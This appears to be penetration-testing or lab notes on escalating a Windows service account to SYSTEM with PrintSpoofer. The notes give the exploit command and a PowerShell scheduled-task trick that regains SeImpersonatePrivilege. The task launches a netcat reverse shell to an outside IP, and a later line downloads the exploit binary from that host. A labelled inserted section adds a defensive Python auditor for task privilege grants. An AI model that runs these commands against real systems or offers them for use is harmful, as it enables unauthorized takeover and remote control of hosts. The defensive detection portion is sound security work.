PrintSpoofer PE (instantly become SYSTEM!)

  • PrintSpoofer is an exploit that escalates a service account to SYSTEM on Windows Server 2016, Server 2019, and Windows 10.

    To escalate privileges, the service account must hold SeImpersonatePrivilege.

Steps:

1. Transfer the exe to the victim and run the command:

PrintSpoofer.exe -i -c cmd

Now we have a reverse shell with more privileges.

Reading through the privileges we have now, SeImpersonatePrivilege is confirmed missing, but it can be regained by creating a ScheduledTaskPrincipal that lists SeImpersonatePrivilege in its RequiredPrivilege attribute.

# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"

# Create a Principal for the task 
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs

# Create an action for the task 
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4445 -e cmd.exe`""

# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal

TaskPath                                       TaskName                          State     
--------                                       --------                          -----     
\                                              GrantAllPerms                     Ready     

# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"
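From the defender's side, the RequiredPrivileges element this trick depends on is written into the task's stored XML definition (the files under C:\Windows\System32\Tasks, or the output of Export-ScheduledTask), so it can be audited. The Python below is an added example, not part of the original note or of PrintSpoofer: it scans a task definition for principals that request SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege and flags service identities; the task XML is constructed to resemble the GrantAllPerms task above, not captured from a host.

```python
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Privileges whose re-grant to a task principal is the signal to look for.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Well-known service identities as they may appear in task XML (SID or name).
SERVICE_IDENTITIES = {"S-1-5-19", "S-1-5-20", "LOCALSERVICE", "LOCAL SERVICE",
                      "NETWORKSERVICE", "NETWORK SERVICE"}

def find_impersonation_grants(task_xml: str) -> list:
    """Return (user_id, sorted privileges) for each principal in a task
    definition whose RequiredPrivileges contain an impersonation privilege."""
    root = ET.fromstring(task_xml)
    hits = []
    for principal in root.iter(f"{TASK_NS}Principal"):
        user = principal.findtext(f"{TASK_NS}UserId", default="")
        privs = {p.text.strip() for p in principal.iter(f"{TASK_NS}Privilege") if p.text}
        granted = privs & IMPERSONATION_PRIVS
        if granted:
            hits.append((user, sorted(granted)))
    return hits

def is_service_identity(user_id: str) -> bool:
    # Reduce "NT AUTHORITY\LOCAL SERVICE" style names to the account part.
    return user_id.split("\\")[-1].upper() in SERVICE_IDENTITIES

def audit_task(task_xml: str) -> list:
    """One finding per principal that re-grants an impersonation privilege."""
    findings = []
    for user, privs in find_impersonation_grants(task_xml):
        who = "service identity" if is_service_identity(user) else "account"
        findings.append(f"{who} {user} requires {', '.join(privs)}")
    return findings

# Constructed sample modelled on a registered task whose principal asks for
# SeImpersonatePrivilege; S-1-5-19 is the LOCAL SERVICE SID.
SAMPLE_TASK_XML = """<Task version="1.4"
      xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-19</UserId>
      <RequiredPrivileges>
        <Privilege>SeChangeNotifyPrivilege</Privilege>
        <Privilege>SeImpersonatePrivilege</Privilege>
      </RequiredPrivileges>
    </Principal>
  </Principals>
</Task>"""

if __name__ == "__main__":
    for finding in audit_task(SAMPLE_TASK_XML):
        print("ALERT:", finding)
```

Run the same function over every exported task definition and alert on any finding for a service identity; a task that a service account needs to register with extra privileges is rare in normal operation.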

SeImpersonatePrivilege is on now! Let's get into the system with PrintSpoofer!

powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164:8080/PrintSpoofer.exe","C:\wamp\www\prints.exe")

rooted!
